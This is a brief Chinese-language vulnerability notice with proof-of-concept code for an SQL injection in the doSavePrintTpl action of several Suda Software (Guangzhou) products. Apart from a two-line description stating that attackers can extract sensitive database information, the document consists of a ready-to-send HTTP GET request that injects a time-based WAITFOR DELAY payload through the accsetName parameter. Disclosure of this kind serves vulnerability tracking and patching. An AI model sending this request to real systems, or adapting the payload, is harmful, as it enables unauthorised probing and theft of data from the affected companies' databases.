漏洞描述
速达软件技术(广州)有限公司提供优秀的企业管理软件和卓越的技术解决方案,旗下多款产品doSavePrintTpl存在SQL注入漏洞,攻击者可利用此漏洞获取数据库敏感信息。
速达软件技术(广州)有限公司多款产品doSavePrintTpl存在SQL注入漏洞
PoC代码
GET /common/print/print!doSavePrintTpl.action?report=1&rptid=1&employId=1&accsetName=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&modId=1 HTTP/1.1